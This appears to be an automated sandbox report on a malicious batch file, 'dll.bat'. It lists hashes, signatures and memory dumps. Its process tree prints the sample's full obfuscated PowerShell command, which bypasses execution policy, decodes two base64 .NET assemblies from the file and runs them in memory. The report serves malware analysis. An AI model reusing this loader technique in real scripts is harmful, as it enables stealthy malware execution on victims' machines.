Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-07-2024 12:35

General

  • Target

    Repo/bin/dll.bat

  • Size

    382KB

  • MD5

    8b1f260a182f74419011f14a8ba21a37

  • SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

  • SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

  • SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

  • SSDEEP

    6144:UJ+xnM15AXYHvdijZhhzPrJaBuLEQ/npzItPvshlqfyef:f8udDJ5hmPvqlRy

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2948

Network

MITRE ATT&CK Enterprise v15


Downloads

  • \Users\Admin\AppData\Local\Temp\Repo\bin\dll.bat.exe

    Filesize

    462KB

    MD5

    852d67a27e454bd389fa7f02a8cbe23f

    SHA1

    5330fedad485e0e4c23b2abe1075a1f984fde9fc

    SHA256

    a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

    SHA512

    327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

  • memory/2948-5-0x000007FEF51FE000-0x000007FEF51FF000-memory.dmp

    Filesize

    4KB

  • memory/2948-6-0x000000001B510000-0x000000001B7F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2948-7-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2948-8-0x0000000000680000-0x0000000000688000-memory.dmp

    Filesize

    32KB

  • memory/2948-9-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2948-10-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2948-12-0x0000000002A90000-0x0000000002A9A000-memory.dmp

    Filesize

    40KB

  • memory/2948-11-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2948-13-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2948-14-0x0000000002AA0000-0x0000000002AEA000-memory.dmp

    Filesize

    296KB

  • memory/2948-15-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

    Filesize

    9.6MB